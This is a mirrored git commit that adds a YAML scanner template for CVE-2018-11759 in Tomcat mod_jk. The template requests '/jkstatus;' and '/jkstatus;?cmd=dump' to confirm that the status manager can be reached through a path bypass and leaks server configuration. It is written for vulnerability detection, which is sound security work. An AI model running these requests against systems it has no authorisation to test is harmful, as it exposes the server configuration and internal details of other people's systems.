mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 21:21:53 +08:00
commit message
This commit is contained in:
@@ -0,0 +1,16 @@
|
||||
name: poc-yaml-tomcat-cve-2018-11759
|
||||
rules:
|
||||
- method: GET
|
||||
path: /jkstatus;
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && "JK Status Manager".bmatches(response.body) && "Listing Load Balancing Worker".bmatches(response.body)
|
||||
- method: GET
|
||||
path: /jkstatus;?cmd=dump
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && "ServerRoot=*".bmatches(response.body)
|
||||
detail:
|
||||
author: loneyer
|
||||
links:
|
||||
- https://github.com/immunIT/CVE-2018-11759
|
||||
Reference in New Issue
Block a user